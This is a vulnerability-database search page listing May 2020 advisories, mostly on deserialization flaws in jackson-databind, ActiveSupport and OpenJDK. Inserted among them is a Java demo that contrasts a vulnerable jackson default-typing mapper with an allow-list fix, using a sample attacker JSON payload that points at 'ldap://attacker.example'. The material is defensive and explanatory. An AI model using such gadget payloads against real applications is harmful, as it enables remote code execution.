Lucene search

4276 matches found

OSV
added 2020/05/28 12:00 p.m. | 16 views

RUSTSEC-2020-0017 Use after free in ArcIntern::drop

ArcIntern::drop has a race condition where it can release memory which is about to get another user. The new user will get a reference to freed memory. This was fixed by serializing access to an interned object while it is being deallocated. Versions prior to 0.3.12 used stronger locking which...

CVSS 8.1 | AI score 7.9 | EPSS 0.00957
Exploits 1 | References 3
OSV
added 2020/05/26 6:15 p.m. | 3 views

CVE-2020-12390

Incorrect origin serialization of URLs with IPv6 addresses could lead to incorrect security checks. This vulnerability affects Firefox < 76...

CVSS 9.8 | AI score 7.4 | EPSS 0.01582
Exploits 0 | References 2
NVD
added 2020/05/26 6:15 p.m. | 17 views

CVE-2020-12390

Incorrect origin serialization of URLs with IPv6 addresses could lead to incorrect security checks. This vulnerability affects Firefox < 76...

CVSS 9.8 | AI score 8.8 | EPSS 0.01582
Exploits 0 | References 2
Prion
added 2020/05/26 6:15 p.m. | 18 views

Security feature bypass

Incorrect origin serialization of URLs with IPv6 addresses could lead to incorrect security checks. This vulnerability affects Firefox < 76...

CVSS 7.5 | AI score 8.8 | EPSS 0.01582
Exploits 0 | References 2 | Affected Software 1
Cvelist
added 2020/05/26 5:03 p.m. | 22 views

CVE-2020-12390

Incorrect origin serialization of URLs with IPv6 addresses could lead to incorrect security checks. This vulnerability affects Firefox < 76...

AI score 8.8 | EPSS 0.01582
Exploits 0 | References 2
CVE
added 2020/05/26 5:03 p.m. | 197 views

CVE-2020-12390

CVE-2020-12390 affects Firefox versions prior to 76. The root cause is incorrect origin serialization of URLs containing IPv6 addresses, which could cause security checks to be bypassed or misjudged. The vulnerability is documented in Mozilla advisory mfsa2020-16 and related bug reports, with pub...

CVSS 9.8 | AI score 8.6 | EPSS 0.01582
Exploits 0 | References 2 | Affected Software 1
Debian CVE
added 2020/05/26 5:03 p.m. | 26 views

CVE-2020-12390

Incorrect origin serialization of URLs with IPv6 addresses could lead to incorrect security checks. This vulnerability affects Firefox < 76...

CVSS 9.8 | AI score 9.5 | EPSS 0.01582
Exploits 0
AlpineLinux
added 2020/05/26 5:03 p.m. | 40 views

CVE-2020-12390

Incorrect origin serialization of URLs with IPv6 addresses could lead to incorrect security checks. This vulnerability affects Firefox < 76...

CVSS 9.8 | AI score 8.9 | EPSS 0.01582
Exploits 0
RedHat Linux
added 2020/05/26 4:09 p.m. | 4 views

jackson-databind: Serialization gadgets in org.apache.commons.dbcp.datasources.*

A flaw was discovered in FasterXML jackson-databind, where it would permit polymorphic deserialization of malicious objects using the commons-dbcp gadget when used in conjunction with polymorphic type handling methods such as enableDefaultTyping or when @JsonTypeInfo is using Id.CLASS or...

CVSS 9.8 | AI score 7.4 | EPSS 0.05681
Exploits 0 | References 4
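
The entry above names the two configurations that turn a "gadget" class into remote code execution: global default typing (enableDefaultTyping) or a field annotated with @JsonTypeInfo(use = Id.CLASS). The following is an added Java example, not code from jackson-databind, Red Hat or any advisory on this page, showing both the vulnerable configuration and the allow-list fix. It assumes jackson-databind 2.10 or later on the classpath (activateDefaultTyping and PolymorphicTypeValidator were introduced in 2.10); the classes Envelope, SafePayload and SideEffectBean and both JSON documents are constructed for this illustration, and SideEffectBean is only a stand-in for a real gadget such as a commons-dbcp DataSource.

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

// Added illustration of the jackson-databind "gadget + polymorphic typing" pattern.
// Not code from jackson-databind or from any advisory; assumes jackson-databind 2.10+.
public class PolymorphicTypingDemo {

    // Our own DTO. The Object-typed field is what makes the mapper consult type info
    // embedded in the document instead of a fixed target class.
    public static class Envelope {
        public String id;
        public Object payload;
    }

    // The only payload type the application actually expects.
    public static class SafePayload {
        public String note;
    }

    // Hypothetical stand-in for a gadget class. A gadget needs nothing more than a
    // no-arg constructor and a setter with side effects for jackson to drive it with
    // attacker data (a real one would e.g. perform a JNDI lookup from the setter).
    public static class SideEffectBean {
        static String lastCommand;          // records that the setter was reached
        public void setCommand(String command) {
            lastCommand = command;
        }
    }

    // Attacker-controlled document (constructed): the WRAPPER_ARRAY form that default
    // typing expects, naming an arbitrary class for the Object-typed field.
    static final String UNTRUSTED =
        "{\"id\":\"1\",\"payload\":[\"PolymorphicTypingDemo$SideEffectBean\","
        + "{\"command\":\"ldap://attacker.example/x\"}]}";

    // Legitimate document (constructed) naming the expected payload type.
    static final String TRUSTED =
        "{\"id\":\"2\",\"payload\":[\"PolymorphicTypingDemo$SafePayload\",{\"note\":\"hi\"}]}";

    // Vulnerable configuration: default typing with no validator, i.e. the legacy
    // enableDefaultTyping() behaviour. Any class that is not on jackson's built-in
    // blocklist is loaded and populated; the advisories on this page are that blocklist
    // being extended one gadget at a time.
    @SuppressWarnings("deprecation")
    static ObjectMapper vulnerableMapper() {
        ObjectMapper m = new ObjectMapper();
        m.enableDefaultTyping(ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE);
        return m;
    }

    // Hardened configuration: an allow-list validator. A class name that is not
    // explicitly allowed is rejected before instantiation. Setting the validator on the
    // mapper as well makes it apply to @JsonTypeInfo(use = Id.CLASS) fields, not only
    // to default typing.
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
            .allowIfSubType("PolymorphicTypingDemo$Safe")   // prefix match on class name
            .build();
        ObjectMapper m = new ObjectMapper();
        m.setPolymorphicTypeValidator(ptv);
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE);
        return m;
    }

    public static void main(String[] args) throws Exception {
        // Vulnerable: the attacker's class is instantiated and its setter runs.
        Envelope e1 = vulnerableMapper().readValue(UNTRUSTED, Envelope.class);
        System.out.println("vulnerable mapper instantiated " + e1.payload.getClass().getName()
            + ", setter received: " + SideEffectBean.lastCommand);

        // Hardened: the same document is refused with InvalidTypeIdException.
        try {
            hardenedMapper().readValue(UNTRUSTED, Envelope.class);
        } catch (InvalidTypeIdException ex) {
            System.out.println("hardened mapper refused type id " + ex.getTypeId());
        }

        // Hardened mapper still accepts the type the application expects.
        Envelope e2 = hardenedMapper().readValue(TRUSTED, Envelope.class);
        System.out.println("hardened mapper accepted " + e2.payload.getClass().getName());
    }
}
```

The design point is the direction of the filter: the vulnerable mapper denies known-bad class names, so every newly discovered gadget (commons-dbcp, commons-jelly, spring-aop in the entries on this page) is exploitable until the next release, whereas the allow-list rejects everything the application did not declare. The allow-list prefix is an assumption for this demo; in real code it should name the application's own DTO package.
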
RedHat Linux
added 2020/05/26 3:50 p.m. | 2 views

jackson-databind: Serialization gadgets in commons-jelly:commons-jelly

A flaw was found in jackson-databind 2.x. The interaction between serialization gadgets and typing is mishandled. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability...

CVSS 8.1 | AI score 7.1 | EPSS 0.05594
Exploits 0 | References 4
RedHat Linux
added 2020/05/26 3:50 p.m. | 71 views

Important: Red Hat Security Advisory: rh-maven35-jackson-databind security update

An update for rh-maven35-jackson-databind is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for eac...

CVSS 8.1 | AI score 7.2 | EPSS 0.05594
Exploits 0 | References 3
RedHat Linux
added 2020/05/26 3:50 p.m. | 3 views

jackson-databind: Serialization gadgets in org.springframework:spring-aop

A flaw was found in jackson-databind 2.x. The interaction between serialization gadgets and typing is mishandled. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability...

CVSS 8.1 | AI score 7.1 | EPSS 0.03607
Exploits 0 | References 4
Github Security Blog
added 2020/05/26 2:49 p.m. | 75 views

ActiveSupport potentially unintended unmarshalling of user-provided objects in MemCacheStore and RedisCacheStore

In ActiveSupport, there is potentially unexpected behaviour in the MemCacheStore and RedisCacheStore where, when untrusted user input is written to the cache store using the raw: true parameter, re-reading the result from the cache can evaluate the user input as a Marshalled object instead of pla...

CVSS 9.8 | AI score 9 | EPSS 0.45732
Exploits 5 | References 13 | Affected Software 1
RedHat Linux
added 2020/05/20 5:35 p.m. | 2 views

OpenJDK: Uncaught InstantiationError exception in ObjectStreamClass (Serialization, 8224549)

Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE component: Serialization. Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via...

CVSS 4.3 | AI score 7.3 | EPSS 0.04211
Exploits 0 | References 4
RedHat Linux
added 2020/05/20 4:46 p.m. | 104 views

Important: Red Hat Security Advisory: java-1.7.1-ibm security update

An update for java-1.7.1-ibm is now available for Red Hat Enterprise Linux 6 Supplementary. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each...

CVSS 8.3 | AI score 6.7 | EPSS 0.0623
Exploits 0 | References 9
RedHat Linux
added 2020/05/20 4:26 p.m. | 4 views

OpenJDK: Uncaught InstantiationError exception in ObjectStreamClass (Serialization, 8224549)

Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE component: Serialization. Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via...

CVSS 4.3 | AI score 7.3 | EPSS 0.04211
Exploits 0 | References 4
RedHat Linux
added 2020/05/20 3:10 p.m. | 5 views

OpenJDK: Uncaught InstantiationError exception in ObjectStreamClass (Serialization, 8224549)

Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE component: Serialization. Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via...

CVSS 4.3 | AI score 7.3 | EPSS 0.04211
Exploits 0 | References 4
Veracode
added 2020/05/19 5:34 a.m. | 29 views

Remote Code Execution

jackson-databind is vulnerable to remote code execution. The vulnerability exists as the untrusted classes org.apache.activemq. were not filtered by default from the interaction between serialization gadgets and polymorphic typing...

CVSS 8.8 | AI score 3.8 | EPSS 0.03489
Exploits 0 | References 9 | Affected Software 4
Packet Storm
added 2020/05/19 12:00 a.m. | 343 views

Protection Licensing Toolkit ReadyAPI 3.2.5 Code Execution / Deserialization

Advisory ID: SYSS-2019-039 Product: Protection Licensing Toolkit, SoapUI/LoadUI/ServiceV Pro Manufacturer: jProductivity LLC, SmartBear Software Affected Versions: - ReadyAPI 3.2.5 Tested Versions: ReadyAPI 3.2.5 Vulnerability Type: Unsafe deserialization/remote code execution CWE-502 Risk Level:...

AI score 0.5 | EPSS 0.117
Exploits 3
IBM Security Bulletins
added 2020/05/18 9:14 p.m. | 53 views

Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM InfoSphere Information Server

Summary There are multiple vulnerabilities in the IBM® SDK Java™ Technology Edition, Versions 7 and 8 that are used by IBM InfoSphere Information Server. These issues were disclosed as part of the IBM Java SDK updates in October 2019 and January 2020. Vulnerability Details CVEID: CVE-2020-2593...

CVSS 7.2 | AI score 1.2 | EPSS 0.0404
Exploits 0 | Affected Software 1